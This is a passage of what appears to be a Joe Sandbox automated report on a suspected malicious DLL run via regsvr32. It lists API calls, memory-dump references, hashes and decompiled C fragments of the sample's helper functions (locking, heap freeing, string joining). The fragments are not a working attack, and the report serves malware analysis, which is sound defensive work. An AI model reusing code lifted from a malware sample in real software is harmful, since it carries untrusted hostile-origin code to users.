                                    • RtlEnterCriticalSection.NTDLL(032F9818), ref: 001A25F6
                                    • Sleep.KERNEL32(0000000A,?,?,001A5FAE,?,?,?,?,?,001A66FE,?,00000001), ref: 001A2600
                                    • HeapFree.KERNEL32(00000000,00000000), ref: 001A2628
                                    • RtlLeaveCriticalSection.NTDLL(032F9818), ref: 001A2644
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.673473096.00000000001A1000.00000020.00020000.sdmp, Offset: 001A0000, based on PE: true
                                    • Associated: 00000006.00000002.673469231.00000000001A0000.00000004.00020000.sdmp
                                    • Associated: 00000006.00000002.673479374.00000000001A9000.00000002.00020000.sdmp
                                    • Associated: 00000006.00000002.673482507.00000000001AA000.00000004.00020000.sdmp
                                    • Associated: 00000006.00000002.673486339.00000000001AC000.00000002.00020000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_1a0000_regsvr32.jbxd
                                    Similarity
                                    • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                    • String ID:
                                    • API String ID: 58946197-0
                                    • Opcode ID: 53005ef34dc36b8fb85e93e4cb9650fb82483108233120f12dfe4eacce9620fa
                                    • Instruction ID: 3dd0c660c7bacda6fb0bca9719027f32f0e80b5f96d9cb90f0250673c922b0c9
                                    • Opcode Fuzzy Hash: 53005ef34dc36b8fb85e93e4cb9650fb82483108233120f12dfe4eacce9620fa
                                    • Instruction Fuzzy Hash: FFF0FE756052409BDB219F6DDE48F163BA8BF17780B048414F946D6A71C730E8D0DB26
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 37%
                                    			E001A1000() {
                                    				void* _v0;
                                    				void** _t3;
                                    				void** _t5;
                                    				void** _t7;
                                    				void** _t8;
                                    				void* _t10;
                                    
                                    				_t3 =  *0x1aa37c; // 0x32f9858
                                    				__imp__( &(_t3[0x10]));
                                    				while(1) {
                                    					_t5 =  *0x1aa37c; // 0x32f9858
                                    					_t1 =  &(_t5[0x16]); // 0x0
                                    					if( *_t1 == 0) {
                                    						break;
                                    					}
                                    					Sleep(0xa);
                                    				}
                                    				_t7 =  *0x1aa37c; // 0x32f9858
                                    				_t10 =  *_t7;
                                    				if(_t10 != 0 && _t10 != 0x1ab85e) {
                                    					HeapFree( *0x1aa290, 0, _t10);
                                    					_t7 =  *0x1aa37c; // 0x32f9858
                                    				}
                                    				 *_t7 = _v0;
                                    				_t8 =  &(_t7[0x10]);
                                    				__imp__(_t8);
                                    				return _t8;
                                    			}









                                    APIs
                                    • RtlEnterCriticalSection.NTDLL(032F9818), ref: 001A1009
                                    • Sleep.KERNEL32(0000000A,?,?,001A5FAE,?,?,?,?,?,001A66FE,?,00000001), ref: 001A1013
                                    • HeapFree.KERNEL32(00000000), ref: 001A1041
                                    • RtlLeaveCriticalSection.NTDLL(032F9818), ref: 001A1056
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.673473096.00000000001A1000.00000020.00020000.sdmp, Offset: 001A0000, based on PE: true
                                    • Associated: 00000006.00000002.673469231.00000000001A0000.00000004.00020000.sdmp
                                    • Associated: 00000006.00000002.673479374.00000000001A9000.00000002.00020000.sdmp
                                    • Associated: 00000006.00000002.673482507.00000000001AA000.00000004.00020000.sdmp
                                    • Associated: 00000006.00000002.673486339.00000000001AC000.00000002.00020000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_1a0000_regsvr32.jbxd
                                    Similarity
                                    • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                    • String ID:
                                    • API String ID: 58946197-0
                                    • Opcode ID: a4a30cfabe73ebe8a7f14319d21b20258087d8583843adfe9af7959ef2d6af11
                                    • Instruction ID: c6e007bcd5820e731749543ceaa224b6895193b85a67dc3984820dad28ea4418
                                    • Opcode Fuzzy Hash: a4a30cfabe73ebe8a7f14319d21b20258087d8583843adfe9af7959ef2d6af11
                                    • Instruction Fuzzy Hash: 37F0DA78200240EBEB19CB24DE89A153BA9BF0B741B054019F902D7B61C734ACC0DA11
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • _free.LIBCMT ref: 6E2C77DB
                                      • Part of subcall function 6E2C7501: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 6E2C7503
                                      • Part of subcall function 6E2C7501: GetCurrentProcess.KERNEL32(C0000417), ref: 6E2C7525
                                      • Part of subcall function 6E2C7501: TerminateProcess.KERNEL32(00000000), ref: 6E2C752C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.674596109.000000006E2AE000.00000020.00020000.sdmp, Offset: 6E2AE000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6e2ae000_regsvr32.jbxd
                                    Similarity
                                    • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                                    • String ID: *?$.
                                    • API String ID: 2667617558-3972193922
                                    • Opcode ID: 6816fd5b34c40beb9d822d6f4898dd8429274c1cba0d87c3e4212a50c6b83c08
                                    • Instruction ID: 5b28a98b3633f6e94b9cbc015a367e7efef628ddc957e3be40e2d3da9c567041
                                    • Opcode Fuzzy Hash: 6816fd5b34c40beb9d822d6f4898dd8429274c1cba0d87c3e4212a50c6b83c08
                                    • Instruction Fuzzy Hash: EC517E75E0420EDFDB44CFF9C880AADBBBAEF48714F24426AD854E7384E7319A458B51
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 6E2C3EE3
                                      • Part of subcall function 6E2C4A72: RaiseException.KERNEL32(?,?,?,6E2C3F05,?,?,?,?,?,?,?,?,6E2C3F05,?,6E2F4D90), ref: 6E2C4AD2
                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 6E2C3F00
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.674596109.000000006E2AE000.00000020.00020000.sdmp, Offset: 6E2AE000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6e2ae000_regsvr32.jbxd
                                    Similarity
                                    • API ID: Exception@8Throw$ExceptionRaise
                                    • String ID: Unknown exception
                                    • API String ID: 3476068407-410509341
                                    • Opcode ID: ff4c01ab07b7199aad51e7f77e52be7382c4e4b3ebb63bdbff4f74c78d4832da
                                    • Instruction ID: 13e3a710e35b5570263c14fa072c29d2b8602b95834483be7ab8478976db8761
                                    • Opcode Fuzzy Hash: ff4c01ab07b7199aad51e7f77e52be7382c4e4b3ebb63bdbff4f74c78d4832da
                                    • Instruction Fuzzy Hash: 61F0F93944420EB78BC0A6E9EC28DDEB37F7D10E14B904FB0A91496181FF60D51682C3
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                      • Part of subcall function 6E2C6D3C: GetLastError.KERNEL32(?,?,6E2C7EEB), ref: 6E2C6D40
                                      • Part of subcall function 6E2C6D3C: _free.LIBCMT ref: 6E2C6D73
                                      • Part of subcall function 6E2C6D3C: SetLastError.KERNEL32(00000000,?,?,6E2C7EEB), ref: 6E2C6DB4
                                    • _free.LIBCMT ref: 6E2C8063
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.674596109.000000006E2AE000.00000020.00020000.sdmp, Offset: 6E2AE000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6e2ae000_regsvr32.jbxd
                                    Similarity
                                    • API ID: ErrorLast_free
                                    • String ID: Pc/n$e
                                    • API String ID: 2283115069-1499828118
                                    • Opcode ID: 51b8984b4470263d1f5c2e4fe0445c6e4cdc77ee188837c4a56f527b5caf20aa
                                    • Instruction ID: f045ce9cd458e01d88cac36be4a0f8d8a69e3c3f82b6798c92f0c883d5e2e130
                                    • Opcode Fuzzy Hash: 51b8984b4470263d1f5c2e4fe0445c6e4cdc77ee188837c4a56f527b5caf20aa
                                    • Instruction Fuzzy Hash: CD017076C51A2E9BCAD59BA8D440199B3B6BB04F26F114709D920A7680C7617942CFC3
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E001A73AF(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
                                    				void* _v8;
                                    				void* _t18;
                                    				int _t25;
                                    				int _t29;
                                    				int _t34;
                                    
                                    				_t29 = lstrlenW(_a4);
                                    				_t25 = lstrlenW(_a8);
                                    				_t18 = E001A77D7(_t25 + _t29 + _t25 + _t29 + 2);
                                    				_v8 = _t18;
                                    				if(_t18 != 0) {
                                    					_t34 = _t29 + _t29;
                                    					memcpy(_t18, _a4, _t34);
                                    					_t10 = _t25 + 2; // 0x2
                                    					memcpy(_v8 + _t34, _a8, _t25 + _t10);
                                    				}
                                    				return _v8;
                                    			}








                                    APIs
                                    • lstrlenW.KERNEL32(004F0053,?,74EC1499,00000008,032F9534,?,001A1543,004F0053,032F9534,?,?,?,?,?,?,001A6DBE), ref: 001A73BF
                                    • lstrlenW.KERNEL32(001A1543,?,001A1543,004F0053,032F9534,?,?,?,?,?,?,001A6DBE), ref: 001A73C6
                                      • Part of subcall function 001A77D7: RtlAllocateHeap.NTDLL(00000000,00000000,001A1275), ref: 001A77E3
                                    • memcpy.NTDLL(00000000,004F0053,74EC16D0,?,?,001A1543,004F0053,032F9534,?,?,?,?,?,?,001A6DBE), ref: 001A73E6
                                    • memcpy.NTDLL(74EC16D0,001A1543,00000002,00000000,004F0053,74EC16D0,?,?,001A1543,004F0053,032F9534), ref: 001A73F9
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.673473096.00000000001A1000.00000020.00020000.sdmp, Offset: 001A0000, based on PE: true
                                    • Associated: 00000006.00000002.673469231.00000000001A0000.00000004.00020000.sdmp
                                    • Associated: 00000006.00000002.673479374.00000000001A9000.00000002.00020000.sdmp
                                    • Associated: 00000006.00000002.673482507.00000000001AA000.00000004.00020000.sdmp
                                    • Associated: 00000006.00000002.673486339.00000000001AC000.00000002.00020000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_1a0000_regsvr32.jbxd
                                    Similarity
                                    • API ID: lstrlenmemcpy$AllocateHeap
                                    • String ID:
                                    • API String ID: 2411391700-0
                                    • Opcode ID: e4870280bdf7c647b96b1ad46f2226044ca44131fdbe656be26346fdba41cfec
                                    • Instruction ID: 0e68c3e3f8473668239910081c195e1afb6f2083c39f139e73ac48e4494c753b
                                    • Opcode Fuzzy Hash: e4870280bdf7c647b96b1ad46f2226044ca44131fdbe656be26346fdba41cfec
                                    • Instruction Fuzzy Hash: FCF0FF76900118BBCF11DFA9CC45C9E7BACEF093547554062FE08D7112E775EA159BE0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • lstrlen.KERNEL32(032F8AA2,00000000,00000000,00000000,001A730A,00000000), ref: 001A7077
                                    • lstrlen.KERNEL32(?), ref: 001A707F
                                      • Part of subcall function 001A77D7: RtlAllocateHeap.NTDLL(00000000,00000000,001A1275), ref: 001A77E3
                                    • lstrcpy.KERNEL32(00000000,032F8AA2), ref: 001A7093
                                    • lstrcat.KERNEL32(00000000,?), ref: 001A709E
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.673473096.00000000001A1000.00000020.00020000.sdmp, Offset: 001A0000, based on PE: true
                                    • Associated: 00000006.00000002.673469231.00000000001A0000.00000004.00020000.sdmp
                                    • Associated: 00000006.00000002.673479374.00000000001A9000.00000002.00020000.sdmp
                                    • Associated: 00000006.00000002.673482507.00000000001AA000.00000004.00020000.sdmp
                                    • Associated: 00000006.00000002.673486339.00000000001AC000.00000002.00020000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_1a0000_regsvr32.jbxd
                                    Similarity
                                    • API ID: lstrlen$AllocateHeaplstrcatlstrcpy
                                    • String ID:
                                    • API String ID: 74227042-0
                                    • Opcode ID: a714383ee233c4b174e03fb00cb1e587f8f6179ebf4cf6a311c100437b777b5d
                                    • Instruction ID: 2e3a959b3f37ab5ca32c1d68160aaec12780df7c20c4a6cc10019d873086c4ef
                                    • Opcode Fuzzy Hash: a714383ee233c4b174e03fb00cb1e587f8f6179ebf4cf6a311c100437b777b5d
                                    • Instruction Fuzzy Hash: 95E092375012206B87115BE89C48CAFBBACFF9B7517040456F700D3510C7208944CBE1
                                    Uniqueness

                                    Uniqueness Score: -1.00%